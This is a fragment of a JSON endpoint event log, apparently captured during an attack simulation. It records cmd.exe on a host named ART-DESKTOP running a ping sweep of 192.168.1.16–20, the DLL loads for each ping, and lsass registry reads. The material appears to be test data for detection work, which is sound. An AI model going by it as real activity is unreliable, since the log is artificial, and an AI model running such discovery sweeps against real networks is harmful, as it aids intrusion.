"event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "process", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572061990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.16", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6380, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572062140000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "event_type": "process", - "pid": 6380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572066840000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.17", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4864, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "process", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572071840000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.18", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6964, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "process", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572076990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.19", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 792, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "process", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572081830000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.20", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4808, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", - "registry_value": "SecureTimeHigh", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", - "registry_value": "SecureTimeEstimated", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", - "registry_value": "SecureTimeLow", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_value": "RunTime", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", - "registry_value": "SecureTimeTickCount", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", - "registry_value": "SecureTimeConfidence", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", - "registry_value": "SecureTimeHigh", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", - "registry_value": "SecureTimeEstimated", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", - "registry_value": "SecureTimeLow", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_value": "RunTime", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", - "registry_value": "SecureTimeTickCount", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", 